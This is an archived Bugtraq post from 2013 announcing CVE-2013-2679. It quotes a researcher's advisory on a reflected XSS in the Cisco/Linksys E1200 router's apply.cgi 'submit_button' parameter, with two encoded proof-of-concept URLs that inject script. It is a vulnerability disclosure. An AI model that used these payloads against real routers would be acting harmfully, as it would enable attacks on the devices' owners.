lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 9 Jul 2013 19:44:43 -0700
From: the infinitenigma <theinfinitenigma@...il.com>
To: bugtraq@...urityfocus.com
Cc: cve-assign@...re.org
Subject: Re: Cisco/Linksys E1200 N300 Reflected XSS

Mitre has assigned the following CVE for this issue:

CVE-2013-2679

On Mon, Apr 29, 2013 at 12:27 AM, Carl Benedict
<theinfinitenigma@...il.com> wrote:
> Summary
> --------------------
> Software  : Cisco/Linksys Router OS
> Hardware : E1200 N300 (others currently untested)
> Version   : 2.0.04 (others currently untested)
> Website   : http://www.linksys.com
> Issue     :  Reflected XSS
> Severity  : Medium
> Researcher: Carl Benedict (theinfinitenigma)
>
> Product Description
> --------------------
> The Cisco/Linksys E1200 N300 is a consumer-grade router, wireless access point, and 10/100 switch.
>
> Details
> --------------------
> The apply.cgi page, which backs all HTML forms on the device, is vulnerable to reflected XSS via the 'submit_button' parameter. The vulnerability is caused due to a lack of input validation and poor/missing server side validation checks. This attack requires an authenticated session. This application uses HTTP basic authentication. Because of this, there is no session, which increases the likelihood of this attack being successful.
>
> Sample URL #1 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27
>
> Sample URL #2 (HTTP GET request):
>
> http://192.168.1.1/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1
>
> History
> --------------------
> 04/26/2013 : Discovery
> 04/27/2013 : Advisory released
>
>
> --
> ∞



-- 
∞

Powered by blists - more mailing lists